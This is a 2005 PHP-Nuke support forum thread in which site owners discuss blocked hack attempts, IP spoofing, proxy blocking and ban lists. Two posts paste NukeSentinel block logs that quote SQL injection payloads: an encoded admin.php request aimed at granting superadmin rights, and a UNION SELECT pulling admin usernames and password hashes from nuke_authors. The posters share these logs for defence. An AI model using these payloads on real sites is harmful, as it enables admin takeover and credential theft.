PHP Web Host - Quality Web Hosting For All PHP Applications $35/month $250/year (Unlimited) - $25/month - 200,000 impressions - Your Ad Could be Here - Click For Details
  Login or Register
 • Home • Downloads • Your Account • Forums • 

View next topic
View previous topic


Google
 
Web RavenPHPScripts (This Site)
Post new topic   Reply to topic
Author Message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 15210
Location: Kansas

PostPosted: Tue Jun 07, 2005 11:08 pm Reply with quote Back to top

mds, Thanks! And keep in mind there's a good chance that he spoofed the IP, but I always send the reports in anyway Wink
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger
persona_non_grata



Joined:
Posts: 0

PostPosted: Wed Jun 08, 2005 3:28 am Reply with quote Back to top

well it all depends to what kind of connection he has,dyn or static..
and believe me...if they are good enough to hack your site they wont be stupid enough to use their own ip.

good step is to set the proxy blocker to on.
but also has consequences...
View user's profile Send private message
mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

PostPosted: Wed Jun 08, 2005 10:14 am Reply with quote Back to top

Raven wrote:
mds, Thanks! And keep in mind there's a good chance that he spoofed the IP, but I always send the reports in anyway Wink


right, i thought of this as well..

persona_non_grata wrote:
well it all depends to what kind of connection he has,dyn or static..
and believe me...if they are good enough to hack your site they wont be stupid enough to use their own ip.

good step is to set the proxy blocker to on.
but also has consequences...


can you give me an example of the consequences ?

also , i know its off topic from the rest of the thread but as of bbtonuke version 2.0.13 or so, wasnt the update supposed to take the forum version out of the footer / copyright area ? mine still shows...2.0.14....
View user's profile Send private message
persona_non_grata



Joined:
Posts: 0

PostPosted: Wed Jun 08, 2005 10:42 am Reply with quote Back to top

well some people without any bad things in mind use a procy or its simple the provider...
as for turning the proxy on will result in banning the person or redirecting them.
View user's profile Send private message
mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

PostPosted: Wed Jun 08, 2005 11:06 am Reply with quote Back to top

Ok, will addeing the IP to the protected list cure this ?
View user's profile Send private message
persona_non_grata



Joined:
Posts: 0

PostPosted: Wed Jun 08, 2005 12:01 pm Reply with quote Back to top

probably...im not 100 percent sure...
atleast you can try....
View user's profile Send private message
64bitguy
The Mouse Is Extension Of Arm


Joined: Mar 06, 2004
Posts: 1140
Location: Manchester, NH USA

PostPosted: Wed Jun 08, 2005 12:16 pm Reply with quote Back to top

No! You don't want to add the IP to the protected list, you want to add it to the banned list.
View user's profile Send private message Visit poster's website
persona_non_grata



Joined:
Posts: 0

PostPosted: Wed Jun 08, 2005 1:32 pm Reply with quote Back to top

yeah something like that...
i think its the sun.. Laughing
View user's profile Send private message
mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

PostPosted: Wed Jun 08, 2005 3:12 pm Reply with quote Back to top

64bitguy wrote:
No! You don't want to add the IP to the protected list, you want to add it to the banned list.


lol no not the IP of the hacker of course that 1 goes to the ban list

the IP if a person is blocked because of sentinal proxy protection
View user's profile Send private message
TheLoneInventor
New Member
New Member


Joined: Jun 06, 2005
Posts: 7
Location: Oregon, USA

PostPosted: Thu Jun 09, 2005 2:22 am Reply with quote Back to top

No problem. Yea, after finding that IP I was aware of being visited frequently in the past by the same guy... Doh! Had I only known... lol

Oh well, live and learn I guess.

EDIT: Oops, missed this second page! lol Yea, the IP could easily be spoofed, although I have recieved about 50 hits on my banned page redirect setup from those IPs already, so...


Last edited by TheLoneInventor on Thu Jun 09, 2005 1:33 pm; edited 1 time in total
View user's profile Send private message Visit poster's website
mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

PostPosted: Thu Jun 09, 2005 9:59 am Reply with quote Back to top

Smile i agree but thanks to raven we have a resource of very knowlegable people who can can help us RavensScripts
View user's profile Send private message
mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

PostPosted: Sat Jun 11, 2005 9:28 am Reply with quote Back to top

well it looks like they tried to hack again heres the email and the ip lookup info this they were caught and blocked RavensScripts :

Date & Time: 2005-06-10 12:08:50 PDT GMT -0700
Blocked IP: 81.215.140.100
User ID: Anonymous (1)
Reason: Abuse-Author
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Query String:
Only registered users can see links on this board!
Get registered or login to the forums!

Get String:
Only registered users can see links on this board!
Get registered or login to the forums!

Post String:
www.XXX.com/admin.php?admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=mod_authors&Submit=Display
Forwarded For: none

Client IP: none
Remote Address: 81.215.140.100
Remote Port: 1229
Request Method: POST


Location: Turkey (high)


% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools may need to be adjusted. See
%
Only registered users can see links on this board!
Get registered or login to the forums!

% for more details.
%
% Rights restricted by copyright.
% See
Only registered users can see links on this board!
Get registered or login to the forums!


% Information related to '81.215.128.0 - 81.215.143.255'

inetnum: 81.215.128.0 - 81.215.143.255
netname: TurkTelekom
descr: ADSL-MET-Acibadem-Dynamic Pool
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
notify: ***@turktelekom.com.tr
changed: ***@turktelekom.com.tr 20050425
source: RIPE

role: TT Administrative Contact Role
address: Turk Telekom
address: Bilisim Aglari Dairesi
address: Aydinlikevler
address: 06103 ANKARA
phone: +90 312 313 1950
fax-no: +90 312 313 1949
e-mail: *****@ttnet.net.tr
admin-c: BADB3-RIPE
tech-c: ZA66-RIPE
tech-c: ZA196-RIPE
tech-c: LA109-RIPE
tech-c: NO638-RIPE
nic-hdl: TTBA1-RIPE
notify: ***@turktelekom.com.tr
mnt-by: AS9121-MNT
changed: ***@telekom.gov.tr 20000608
changed: ***@telekom.gov.tr 20001020
changed: ***@telekom.gov.tr 20010615
changed: ***@turktelekom.com.tr 20040903
source: RIPE

% Information related to '81.215.128.0/17AS9121'

route: 81.215.128.0/17
descr: TurkTelecom
origin: AS9121
mnt-by: AS9121-MNT
changed: ***@turktelekom.com.tr 20040927
source: RIPE
View user's profile Send private message
mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

PostPosted: Sun Jun 12, 2005 10:03 am Reply with quote Back to top

and tried again

Date & Time: 2005-06-12 02:44:31 PDT GMT -0700
Blocked IP: 85.96.71.187
User ID: Anonymous (1)
Reason: Abuse-Union
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
FunWebProducts)
Query String:
Only registered users can see links on this board!
Get registered or login to the forums!

pm.privmsgs_type=-99 UNION SELECT
aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
FROM nuke_authors WHERE radminsuper=1 LIMIT 1/*
Get String:
Only registered users can see links on this board!
Get registered or login to the forums!

pm.privmsgs_type=-99 UNION SELECT
aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
FROM nuke_authors WHERE radminsuper=1 LIMIT 1/*
Post String:
Only registered users can see links on this board!
Get registered or login to the forums!

Forwarded For: none
Client IP: none
Remote Address: 85.96.71.187
Remote Port: 3061
Request Method: GET
View user's profile Send private message
christianb
Worker
Worker


Joined: Nov 24, 2004
Posts: 131
Location: Batesville, AR

PostPosted: Wed Jun 15, 2005 1:11 pm Reply with quote Back to top

TheLoneInventor wrote:
65.19.134.2 - is the one I believe was used to hack the site, through the forums by the look of it. 2608 URLs were hit by this IP from the kralkayra username.
That IP is familiar...
65.19.169.235 was used on my site

Code:
IP Address     Last Viewed           Hits

65.19.169.235  2005-05-27 @ 01:59:10 2169
all pretty much within an hour's time.
View user's profile Send private message Visit poster's website
Susann
Moderator


Joined: Dec 19, 2004
Posts: 2273
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Thu Jun 23, 2005 7:30 am Reply with quote Back to top

65.19.169.235 OmniExplorer_Bot/1.07 (+http://www.omni-explorer.com) Internet Categorizer is one of the bad bots doesn´t read robots.txt using different Ip´s and I heard also about different User Agent Strings.
View user's profile Send private message Visit poster's website
VinDSL
Life Cycles Becoming CPU Cycles


Joined: Jul 11, 2004
Posts: 616
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

PostPosted: Thu Jun 23, 2005 12:12 pm Reply with quote Back to top

OffTopic ...I caught Iranians trying to hack my site this morning.

They were trying to breach admin.php with a SQL exploit on an ODP (Open Directory Project) module I'm developing.

If you're in a 'banning' mood, here's their URL: 217.219.194.163

If you'd like send 'em an E-card, their addy is
Only registered users can see links on this board!
Get registered or login to the forums!
ROTFL
View user's profile Send private message Visit poster's website ICQ Number
Display posts from previous:       
Post new topic   Reply to topic

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
Forums ©
 

All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2008 by Raven
Proud to be listed at Lobo Links Web Directory

You can syndicate our news using the file xml

CSE HTML Validator Helped Clean up This Page! [Valid RSS] valid RSS 2.0 Valid robots.txt Stop Spam Harvesters, Join Project Honey Pot

Website engines core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is a free software released under the GNU/GPL.


:: fisubice phpbb2 style by Daz :: PHP-Nuke theme by www.nukemods.com ::

:: fisubice Theme Recoded To 100% W3C CSS & HTML 4.01 Transitional Compliance by Raven and 64bitguy ::

:: W3C CSS Compliance Validation :: W3C HTML 4.01 Transitional Compliance Validation ::

zerosum